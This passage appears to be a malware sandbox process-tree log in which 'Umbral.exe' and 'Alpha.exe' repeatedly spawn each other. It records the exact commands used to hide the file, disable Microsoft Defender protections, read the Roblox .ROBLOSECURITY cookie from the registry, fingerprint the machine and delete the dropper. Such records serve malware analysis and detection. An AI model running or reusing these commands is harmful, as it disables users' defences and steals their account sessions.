        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        28⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        29⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Drops file in Drivers directory
        
        PID:4016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        31⤵
        
        PID:1556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:1608
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Views/modifies file attributes
        
        PID:4720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        31⤵
        
        PID:1804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:4740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        31⤵
        
        PID:4304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        31⤵
        
        PID:5044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        31⤵
        
        PID:1292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        31⤵
        
        PID:1876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        31⤵
        Detects videocard installed
        
        PID:2884
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        31⤵
        
        PID:3832
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        32⤵
        Runs ping.exe
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        30⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        31⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        
        PID:328
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        32⤵
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Drops file in Drivers directory
        
        PID:3160
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:4812
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        Views/modifies file attributes
        
        PID:3644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        34⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:4536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        34⤵
        
        PID:5100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        34⤵
        
        PID:1324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        34⤵
        
        PID:4472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        34⤵
        Detects videocard installed
        
        PID:4812
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        34⤵
        
        PID:4184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:5044
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        35⤵
        Runs ping.exe
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        33⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        34⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        35⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        Drops file in Drivers directory
        
        PID:1368
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:2716
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        Views/modifies file attributes
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:1404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:4580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:3200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        
        PID:3656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:3772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1324
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        37⤵
        
        PID:2148
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        Runs ping.exe
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        36⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        37⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        38⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Drops file in Drivers directory
        
        PID:2448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:3400
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        Views/modifies file attributes
        
        PID:4004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:2804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:1656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:3992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:1812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        
        PID:232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:4752
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        40⤵
        
        PID:5116
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        Runs ping.exe
        
        PID:476
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        39⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        40⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:796
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        41⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        Drops file in Drivers directory
        
        PID:1564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:4300
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        Views/modifies file attributes
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        
        PID:3236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:1276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:2304
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:4140
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:4128
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:5016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        
        PID:5004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:2192
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        43⤵
        
        PID:236
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        Runs ping.exe
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        42⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        43⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        44⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        Drops file in Drivers directory
        
        PID:3584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:792
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        Views/modifies file attributes
        
        PID:3400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        46⤵
        
        PID:476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:1820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        46⤵
        
        PID:3256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        46⤵
        
        PID:1296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        46⤵
        
        PID:1860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:4640
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        46⤵
        Detects videocard installed
        
        PID:3624
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        46⤵
        
        PID:4776
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        47⤵
        Runs ping.exe
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        45⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        46⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        47⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        Drops file in Drivers directory
        
        PID:3900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:2972
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        Views/modifies file attributes
        
        PID:3228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        49⤵
        
        PID:1488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:2868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:3772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        49⤵
        
        PID:2008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        49⤵
        
        PID:4968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        49⤵
        
        PID:2396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        49⤵
        Detects videocard installed
        
        PID:3972
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        49⤵
        
        PID:2108
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        50⤵
        Runs ping.exe
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        48⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        49⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        50⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        Drops file in Drivers directory
        
        PID:476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:1556
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        Views/modifies file attributes
        
        PID:2852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        52⤵
        
        PID:4988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:4544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:2004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        52⤵
        
        PID:1364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        52⤵
        
        PID:800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        52⤵
        
        PID:3488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        52⤵
        Detects videocard installed
        
        PID:4140
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        52⤵
        
        PID:4764
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        53⤵
        Runs ping.exe
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        51⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        52⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        53⤵
        
        PID:2152
        
